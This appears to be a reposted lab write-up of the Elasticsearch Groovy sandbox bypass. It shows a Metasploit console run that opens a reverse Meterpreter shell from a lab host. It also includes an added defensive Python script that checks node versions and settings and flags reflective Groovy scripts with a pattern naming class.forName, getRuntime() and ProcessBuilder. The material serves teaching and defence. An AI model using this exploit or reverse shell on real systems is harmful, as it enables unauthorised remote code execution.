Lab - ElasticSearch Search Groovy Sandbox Bypass
Source: Internet | Category: Software lifecycle management | Editor: 程序博客网 | Time: 2024/05/02 02:02
Download: https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-0
Elasticsearch is a search server based on Lucene. It provides a distributed, multitenant-capable full-text search engine with an HTTP web interface and schema-free JSON documents. Elasticsearch is developed in Java and is released as open source under the terms of the Apache License. Elasticsearch is the most popular enterprise search engine followed by Apache Solr, also based on Lucene.
Install
Please read the page.
Elasticsearch can be started using:
$ bin/elasticsearch
On *nix systems, the command will start the process in the foreground.
Running as a daemon
To run it in the background, add the -d switch to it:
$ bin/elasticsearch -d
PID
The Elasticsearch process can write its PID to a specified file on startup, making it easy to shut down the process later on:
$ bin/elasticsearch -d -p pid
$ kill `cat pid`
Exploit
This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the REST API, which does not require authentication, where the search function allows groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName to reference arbitrary classes. It can be used to execute arbitrary Java code. This module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.
msf exploit(search_groovy_script) > show options

Module options (exploit/multi/elasticsearch/search_groovy_script):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.102    yes       The target address
   RPORT      9200             yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to the ElasticSearch REST API
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   ElasticSearch 1.4.2

msf exploit(search_groovy_script) > run

[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Checking vulnerability...
[*] Discovering TEMP path...
[+] TEMP path on '/tmp'
[*] Discovering remote OS...
[+] Remote OS is 'Linux'
[*] Trying to load metasploit payload...
[*] Sending stage (46112 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.102:59238) at 2016-03-05 08:25:25 +0800
[+] Deleted /tmp/rCrwvV.jar
meterpreter > sysinfo
Computer    : lab
OS          : Linux 4.3.0-kali1-686-pae (i386)
Meterpreter : java/java
meterpreter >
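The write-up above describes two things a defender can act on: the node is vulnerable only while it runs a pre-1.4.3 build with the Groovy sandbox enabled, and the attack arrives as an unauthenticated _search request whose Groovy script uses reflection (the page names java.lang.Math.class.forName) to reach classes outside the sandbox. The following Python script is an added example, not part of the original lab and not Metasploit or Elasticsearch code; it checks a node's version and elasticsearch.yml settings against the fix (upgrade to 1.4.3, or set script.groovy.sandbox.enabled: false; script.disable_dynamic: true also blocks it), and scans captured request bodies for reflective Groovy scripts. The log lines, IPs and the simplified "ip path body" log format are constructed for the example.

```python
"""Defensive triage for Groovy script abuse against the Elasticsearch 1.4.x
REST API (the CVE-2015-1427 sandbox bypass described in the lab).
Added example; the log format and sample requests are constructed here."""
import json
import re

FIXED_VERSION = (1, 4, 3)  # first release with the sandbox bypass fixed

# Reflection / process hooks inside an inline Groovy script that a sandbox
# escape would need. class.forName is the one named on the page; the other
# two are generic hooks worth flagging in the same sweep.
SUSPICIOUS = re.compile(r"(class\.forName|getRuntime\(\)|ProcessBuilder)")


def parse_version(version: str) -> tuple:
    """'1.4.2' -> (1, 4, 2); only the first three numeric parts are used."""
    return tuple(int(p) for p in version.split(".")[:3])


def _is_true(value) -> bool:
    """elasticsearch.yml values may arrive as bool or as the string 'true'."""
    return str(value).lower() == "true"


def is_vulnerable_config(version: str, settings: dict) -> bool:
    """True if a node of this version, with these flattened elasticsearch.yml
    settings, still accepts dynamic Groovy scripts through the sandbox."""
    if parse_version(version) >= FIXED_VERSION:
        return False
    if _is_true(settings.get("script.disable_dynamic", False)):
        return False  # all dynamic scripting off, sandboxed or not
    # 1.4.x default: sandbox enabled, so dynamic Groovy is accepted
    return _is_true(settings.get("script.groovy.sandbox.enabled", True))


def groovy_scripts(body):
    """Yield every inline script string in a _search body that will run as
    Groovy (the default script language in 1.4, so a missing lang counts)."""
    if isinstance(body, dict):
        script = body.get("script")
        if isinstance(script, str) and body.get("lang", "groovy") == "groovy":
            yield script
        for value in body.values():
            yield from groovy_scripts(value)
    elif isinstance(body, list):
        for value in body:
            yield from groovy_scripts(value)


def scan_requests(log_lines):
    """Return (client_ip, matched_token) for each _search request whose Groovy
    script contains a reflective call. Lines are 'ip path json-body'."""
    hits = []
    for line in log_lines:
        ip, path, body = line.split(" ", 2)
        if not path.endswith("_search"):
            continue
        try:
            doc = json.loads(body)
        except json.JSONDecodeError:
            continue  # malformed body, nothing to inspect
        for script in groovy_scripts(doc):
            match = SUSPICIOUS.search(script)
            if match:
                hits.append((ip, match.group(1)))
    return hits


# Constructed sample traffic: a plain query, a benign script_fields use, and
# a script that reaches for class.forName (with a harmless class name).
SAMPLE_REQUESTS = [
    ("10.0.0.5", "/_search", {"query": {"match_all": {}}}),
    ("10.0.0.7", "/logs/_search", {"size": 1, "script_fields": {
        "doubled": {"script": "doc['size'].value * 2", "lang": "groovy"}}}),
    ("10.0.0.9", "/_search", {"size": 1, "script_fields": {
        "x": {"script": "java.lang.Math.class.forName('java.util.Date')",
              "lang": "groovy"}}}),
]
SAMPLE_LOG = [f"{ip} {path} {json.dumps(body)}" for ip, path, body in SAMPLE_REQUESTS]

if __name__ == "__main__":
    print("1.4.2, defaults  ->", is_vulnerable_config("1.4.2", {}))
    print("1.4.2, sandbox off ->",
          is_vulnerable_config("1.4.2", {"script.groovy.sandbox.enabled": False}))
    for ip, token in scan_requests(SAMPLE_LOG):
        print(f"{ip}: reflective Groovy script ({token})")
```

Only the third request is flagged: ordinary script_fields arithmetic passes, so the check separates legitimate scripting from sandbox escapes rather than alerting on every Groovy script. Feeding real traffic into scan_requests means adapting the one-line parsing to whatever proxy or access log actually captures request bodies.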
References
https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch
http://drops.wooyun.org/papers/5107